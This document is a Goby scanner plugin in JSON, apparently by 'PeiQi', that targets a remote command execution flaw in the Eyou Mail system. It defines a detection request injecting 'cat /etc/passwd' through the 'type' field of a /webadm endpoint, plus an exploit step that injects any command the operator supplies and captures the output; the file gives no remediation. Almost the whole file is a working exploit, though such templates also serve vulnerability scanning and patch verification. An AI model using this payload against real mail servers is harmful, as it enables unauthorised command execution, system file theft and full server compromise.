{
      "Name": "Eyou Mail system RCE",
      "Level": "3",
      "Tags": [
            "RCE"
      ],
      "GobyQuery": "app=\"Eyou-Mail-system\"",
      "Description": "There is a remote command execution vulnerability in Yiyou e-mail system, which allows attackers to execute arbitrary commands",
      "Product": "Eyou Mail system",
      "Homepage": "http://www.eyou.net/case/case06.html",
      "Author": "PeiQi",
      "Impact": "<p>which allows attackers to execute arbitrary commands<br></p>",
      "Recommandation": "<p>undefined</p>",
      "References": [
            "http://wiki.peiqi.tech"
      ],
	  "HasExp": true,
	  "ExpParams": [
		{
			"name": "Cmd",
			"type": "input",
			"value": "cat /etc/passwd",
			"show": ""
		}
	  ],
      "ScanSteps": [
            "AND",
            {
                  "Request": {
                        "method": "POST",
                        "uri": "/webadm/?q=moni_detail.do&action=gragh",
                        "follow_redirect": false,
                        "header": {
                              "Content-Type": "application/x-www-form-urlencoded"
                        },
                        "data_type": "text",
                        "data": "type='|cat /etc/passwd||'"
                  },
                  "ResponseTest": {
                        "type": "group",
                        "operation": "AND",
                        "checks": [
                              {
                                    "type": "item",
                                    "variable": "$code",
                                    "operation": "==",
                                    "value": "200",
                                    "bz": ""
                              },
                              {
                                    "type": "item",
                                    "variable": "$body",
                                    "operation": "contains",
                                    "value": "root",
                                    "bz": ""
                              }
                        ]
                  },
                  "SetVariable": []
            }
      ],
	  "ExploitSteps": [
            "AND",
            {
                  "Request": {
                        "method": "POST",
                        "uri": "/webadm/?q=moni_detail.do&action=gragh",
                        "follow_redirect": false,
                        "header": {
                              "Content-Type": "application/x-www-form-urlencoded"
                        },
                        "data_type": "text",
                        "data": "type='|{{{Cmd}}}||'"
                  },
                  "SetVariable": [
					"output|lastbody"
				  ]
            }
      ],
      "PostTime": "2021-04-10 13:52:01",
      "GobyVersion": "1.8.258"
}